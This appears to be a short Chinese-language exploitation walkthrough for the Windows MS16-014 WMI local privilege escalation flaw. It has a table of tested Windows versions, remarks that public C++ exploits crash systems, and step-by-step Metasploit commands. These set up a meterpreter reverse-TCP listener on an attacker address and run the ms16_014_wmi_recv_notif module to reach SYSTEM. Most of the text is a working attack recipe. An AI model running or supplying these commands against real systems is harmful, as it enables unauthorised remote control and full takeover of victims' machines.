错误处理了DLL加载,从而允许本地加载获得特权。
Product | CPU Architecture | Version | Update | Tested |
---|---|---|---|---|
Windows 10 | ||||
Windows 10 | 1511 | |||
Windows 7 | SP1 | ✔ | ||
Windows 8.1 | ||||
Windows Rt 8.1 | ||||
Windows Server 2008 | SP2 | ✘ | ||
Windows Server 2008 | R2 | SP1 | ✘ | |
Windows Server 2012 | ✘ | |||
Windows Server 2012 | R2 | ✘ | ||
Windows Vista | SP2 |
测试了网上能够找到的c++代码版本,Windows 7 x86/x64都会蓝屏,Windows Server 2008/2012所有版本都没反应,所有这边只能使用MSF版本。MSF版本中只有payload/windows/x64/meterpreter/reverse_tcp
版本的反弹shell能够利用,payload/windows/meterpreter/reverse_tcp
版本利用失败
测试系统Windows 7 SP1 x64,首先进行监听
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.9
set lport 12345
run
可以看到如下的反弹shell
接着使用提权漏洞
use exploit/windows/local/ms16_014_wmi_recv_notif
set session 2#你当前的session
run
可以看到我们最后成为了SYSTEM权限